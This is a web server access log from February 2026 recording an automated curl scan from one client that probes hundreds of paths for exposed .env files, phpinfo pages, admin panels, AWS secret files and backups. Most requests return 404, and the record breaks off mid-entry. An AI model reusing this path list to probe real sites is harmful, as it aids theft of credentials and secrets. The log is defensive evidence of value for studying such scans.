[Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.well-known/openid-configuration" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.well-known/security.txt" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/07-accessing-data/begin/vue-heroes/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/07-accessing-data/end/vue-heroes/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/08-routing/begin/vue-heroes/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/08-routing/end/vue-heroes/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/09-managing-state/begin/vue-heroes/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/09-managing-state/end/vue-heroes/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/123.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/3-sequelize/final/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/31_structure_tests/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/?p=info" [Client 185.177.72.38] [Length 9999] [Gzip 5.07] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/?p=php" [Client 185.177.72.38] [Length 9999] [Gzip 5.07] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/?phpinfo" [Client 185.177.72.38] [Length 9999] [Gzip 5.07] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/?phpinfo.php" [Client 185.177.72.38] [Length 9999] [Gzip 5.07] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/?phpinfo=1" [Client 185.177.72.38] [Length 9999] [Gzip 5.07] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/?q=info" [Client 185.177.72.38] [Length 9999] [Gzip 5.07] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/__debug__" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/__debugbar" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/__tests__/test-become/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_astro/[chunk-name].[hash].js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_dev" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_ignition/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_next/static/chunks/945-34f67d7c0866cf61b970.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_next/static/chunks/app/%5B...not-found%5D/page-63e952e68a371605.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_next/static/chunks/app/error.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_next/static/chunks/app/global-error.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_next/static/chunks/app/layout-a908fe02173ed4b1.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_next/static/chunks/framework-[hash].js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_next/static/chunks/main-app-[hash].js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_next/static/chunks/pages/_app-a9fba37d935ce3f3.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_next/static/chunks/pages/_app-d1b5411bacd03f02.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_next/static/chunks/pages/_app-d25b242610000153a081.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_next/static/chunks/webpack-[hash].js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_static/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/a.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/acme-challenge/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/acme/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/acme_challenges/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/actions-server/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/actuator/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin-api/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin-app/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin-panel/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin/info.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/adminapp/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/adminer.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/adminer/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/administrator/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/adminphp.php'" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/agora/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/alpha/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/anaconda/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/apache.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/apache/i.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/apache/info.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/apache/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/apache2.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/apc.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api-server/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/.env.back" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/.env.example" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/.env.sample" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/.env.save" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/debug" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/docs/" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/env" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/info.php" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/internal/" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/keys" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/private/" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/src/.env" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/v1/.env" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/v1/debug" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/v2/.env" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/apis/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app-7d66de919618d3830635.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app-order-client/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app.yaml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app/.env.example" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app/.env.sample" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app/.env.save" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app//.env.back" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app/client/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app/code/community/Nosto/Tagging/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app/config.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app/config/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app/config/dev/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app/frontend/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app/info" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app/info.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app1-static/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app2-static/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app_dir/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app_nginx_static_path/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/application/.env.sample" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/application/.env.save" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/apps/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/apps/client/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Archipel/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/asdf.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/asset_img/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/index-[hash].js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/index-[hash].mjs" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/index-GquDNGwd.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/js/app.f8ec9fb3.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/js/app.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/vendor-[hash].js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Assignment3/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Assignment4/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/audio/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/aws-secret.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/aws.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/aws/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/azure/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/babel-plugin-dotenv/test/fixtures/as-alias/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/babel-plugin-dotenv/test/fixtures/default/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/babel-plugin-dotenv/test/fixtures/dev-env/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/babel-plugin-dotenv/test/fixtures/empty-values/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/babel-plugin-dotenv/test/fixtures/filename/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/babel-plugin-dotenv/test/fixtures/override-value/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/babel-plugin-dotenv/test/fixtures/prod-env/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/back-end/app/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/back/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backend/.env.local" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backend/config/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backend/debug" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backend/src/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backendfinaltest/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backup.tar.gz" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:50 +0000] - 404 404 - GET https 